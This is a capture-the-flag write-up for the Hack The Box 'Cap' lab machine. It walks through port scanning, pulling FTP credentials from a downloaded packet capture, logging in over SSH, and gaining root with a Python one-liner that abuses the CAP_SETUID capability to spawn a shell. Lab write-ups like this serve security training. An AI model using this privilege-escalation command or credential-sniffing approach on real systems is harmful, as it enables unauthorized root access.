Pwn Cap by Hack The Box Walkthrough / Writeup!

Hello friends! today we are going to take a look at a very easy ctf challenge from hack the box

Called “Cap” the credit for this machine goes to infosecjack.

It’s a linux based system,

So without further ado let’s hack!! :)

First things first after joining the machine do a quick ping to check whether the connection between your system and machine is established or not.

Now

#Step 1 (Recon the available ports & services running onto the target machine)

As we can see from the nmap results port 80 is open & and it’s loading a html page along with it!

#Step 2 (Now let’s get acquainted with our site. )

After browsing the website we can conclude there’s some useful information in “security snapshot” page

After the page load's locate & choose the stock with the most elements in the partition.
So i choose ‘data/0’ directory, Then download .pcap the file from the page.
Use the command wireshark 0.pcap to open the file from the terminal.

#Step 3 ( Examine the file & find ftp details )

And Voila!. We found the username and password for the user.

#Step 4 ( SSH & Stuff! )

From our recon stage we can see the nmap result shows that port “22” is open so let’s try ssh into the server..

Using the command: “ ssh nathan@ip “

Once successfully logged in, do ls & cat the user flag and submit it to hack the box.

#Step 5 ( Privilege Escalation )

If a binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.

For more check out this page: https://gtfobins.github.io/gtfobins/python/#sudo

From the given resource we are using the following script:

python -c 'import os; os.setuid(0); os.system("/bin/sh")'

And Voila! we have our root flag as well, Congratulations!! :)

Now submit the flag to get your own cap pwned badge from hack the box.